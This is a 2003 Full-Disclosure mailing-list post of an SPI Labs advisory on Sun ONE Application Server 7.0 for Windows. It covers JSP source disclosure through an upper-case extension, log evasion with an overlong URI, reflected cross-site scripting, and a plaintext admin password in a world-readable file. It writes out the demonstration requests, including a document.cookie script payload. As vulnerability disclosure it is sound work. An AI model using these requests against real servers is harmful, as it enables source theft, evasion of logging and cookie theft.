[Full-Disclosure] Multiple Vulnerabilities in Sun-One Application Server

From: SPI Labs (spilabs_at_spidynamics.com)
Date: 05/28/03

  • Next message: Auriemma Luigi: "Exploit: Quake 3 engine, con\con and heartbeats (just for fun)"
    To: <bugtraq@securityfocus.com>, <webappsec@securityfocus.com>, <vulnwatch@vulnwatch.org>, <press@net-security.org>, <snpmarq@SecurityNewsPortal.com>, <full-disclosure@lists.netsys.com>
    Date: Tue, 27 May 2003 18:48:04 -0400
    

    Multiple Vulnerabilities in Sun-One Application Server
    -------------------------------------------------------

    [Release Date]: May 27, 2003

    [System Affected]
    * Sun-ONE Application Server 7.0 for Windows 2000/XP

    [Description]
    During a brief audit of a SunONE Application Server installation
    on Windows 2000, SPI Labs discovered a number of vulnerabilities.
    Each of the vulnerabilities is described in detail below. The complete
    advisory is also available from our website at:
    http://www.spidynamics.com/sunone_alert.html.

    Issue 1: JSP source code disclosure
    Severity: High
    -------------------------------------

    It is possible to view the source code of JSP applications by changing
    the case of the file extension in the HTTP request. The vulnerability
    is due to Unix code being ported to the Microsoft Windows platform where
    the filesystem is case insensitive. When a request is received, the server
    performs a case sensitive check to determine if the request ends in ".jsp".
    If it does, the JSP engine will process it. Otherwise, it will see if it
    can retrieve the requested resource from the filesystem. On Unix operating
    systems, this will fail because of "file.jsp" cannot be opened by asking for
    "file.JSP" However, on Windows the file will be returned because the
    filesystem
    is case insensitive. Below is an example of a normal request/response,
    followed
    by the same request/response with the case change applied. The headers and
    response data have been trimmed for clarity.

    [Original request]

    GET /hello.jsp HTTP/1.0

    [Original response]

    HTTP/1.1 200 OK
    Server: Sun-ONE-Application-Server/7.0
    (more headers)

    <html>
    <head><title>Hello World JSP Example</title></head>
    <body>
    <h1>Hello World</h1>
    It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
    </body></html>

    [Request with case change]

    GET /hello.JSP HTTP/1.0

    [Response with case change]

    HTTP/1.1 200 OK
    Server: Sun-ONE-Application-Server/7.0
    (more headers)

    <html>
    <head><title>Hello World JSP Example</title></head>
    <body>
    <h1>Hello World</h1>
    It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.
    </body></html>

    Issue 2: Log evasion
    Severity: Medium
    -------------------------------------

    Only the first 4042 characters of a request URI are logged, even though the
    maximum URI length appears to be 4096 characters. This gives an attacker
    54 characters to construct an attack with. Although it is possible that an
    administrator would still notice the unusual requests, he or she would be
    unable
    to determine what files or parameters the attacker would be requesting.
    Because
    of this, the administrator would not be able to find out what components of
    their
    system are being exploited. Below is an example request for /hello.jsp, as
    well
    as the log data. The headers, request and response data have been trimmed
    for clarity.

    [Request for /hello.jsp]

    GET
    /AAAAAAAAAAAAAA[ up to 4042 characters]/../hello.jsp HTTP/1.0

    [Console message]

    WARNING: HTTP4198: flex log buffer overflow- greater than 4096 characters

    Server log file

    [04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow-
    greater than 4096 characters

    Access log file

    172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET
    /AAAAAAAAAA[ up to 4042 characters] ...

    The name of the file that was accessed does not appear in the logs.

    Issue 3: Cross site scripting
    Severity: Low
    -------------------------------------

    If an error occurs while processing a Java application, it may be possible
    to
    execute cross-site scripting attacks by placing scripted content in the
    query
    string. Below is an example of a request using a sample application
    followed
    by the relevant portion of the response.

    [Request]

    GET /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script>
    HTTP/1.0

    [Response snippet]

    Exception Report<br><br>
    <b>Message: </b>Internal Server Error<br>
    <p>
    <b>Exception</b>
    <pre>javax.servlet.ServletException: Invalid JSP file
    <script>alert(document.cookie)</script>
    at
    org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImp
    l.java:471)
    at _jasper._jsp._source_jsp._jspService(_source_jsp.java:88)

    Issue 4: Incorrect local file permissions and plaintext passwords
    Severity: Medium
    -------------------------------------

    When installing SunONE on Windows 2000 the default installation directory is
    C:\sun.
    Any file or directory created in this directory will be world-readable. The
    "statefile"
    located at C:\sun\appserver7\statefile contains a plaintext username and
    password to
    the administrative server. .

    Remediation
    -------------------------------------

    Sun Microsystems was contacted on the 18th of March 2003 and again on
    numerous occasions
    without results. We hope that by publishing this information, the vendor
    will correct
    these problems. Unfortunately, there is no remediation procedure for the
    first, second or
    third issues. For the last issue, "Incorrect local file permissions and
    plaintext passwords"
    we recommend that the permissions of the statefile be changed so that only
    the administrator
    can access it.

    [Contact Information]

    Contact Information
    spilabs@spidynamics.com
    SPI Dynamics, Inc.
    115 Perimeter Center Place N.E.
    suite 270
    Atlanta, GA. 30346
    Toll-Free Phone: (866) 774-2700

    SPI Dynamics was founded in 2000 by a team of accomplished Web security
    specialists; SPI Dynamics is
    the leader in Web application security technology. With such signature
    products as WebInspect, SPI Dynamics
    is dedicated to protecting companies' most valuable assets. SPI Dynamics has
    created a new breed of
    Internet security products for the Web application, the most vulnerable yet
    least secure component of
    online business infrastructure.

    Copyright (c) 2003 SPI Dynamics, Inc. All rights reserved worldwide.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Auriemma Luigi: "Exploit: Quake 3 engine, con\con and heartbeats (just for fun)"

    Relevant Pages

    • Re: EAP-TLS with windows CE
      ... The AP was sending out an Identity Request every second, ... request to the identification server. ... When the server asks the Windows CE device to identify itself, ... I could easily steal your authentication information. ...
      (microsoft.public.windowsce.platbuilder)
    • Multiple Vulnerabilities in Sun-One Application Server
      ... Multiple Vulnerabilities in Sun-One Application Server ... on Windows 2000, SPI Labs discovered a number of vulnerabilities. ... the case of the file extension in the HTTP request. ...
      (Bugtraq)
    • [VulnWatch] Multiple Vulnerabilities in Sun-One Application Server
      ... Multiple Vulnerabilities in Sun-One Application Server ... on Windows 2000, SPI Labs discovered a number of vulnerabilities. ... the case of the file extension in the HTTP request. ...
      (VulnWatch)
    • [VulnWatch] Multiple Vulnerabilities in Sun-One Application Server
      ... Multiple Vulnerabilities in Sun-One Application Server ... on Windows 2000, SPI Labs discovered a number of vulnerabilities. ... the case of the file extension in the HTTP request. ...
      (Full-Disclosure)
    • Multiple Vulnerabilities in Sun-One Application Server
      ... Multiple Vulnerabilities in Sun-One Application Server ... on Windows 2000, SPI Labs discovered a number of vulnerabilities. ... the case of the file extension in the HTTP request. ...
      (Full-Disclosure)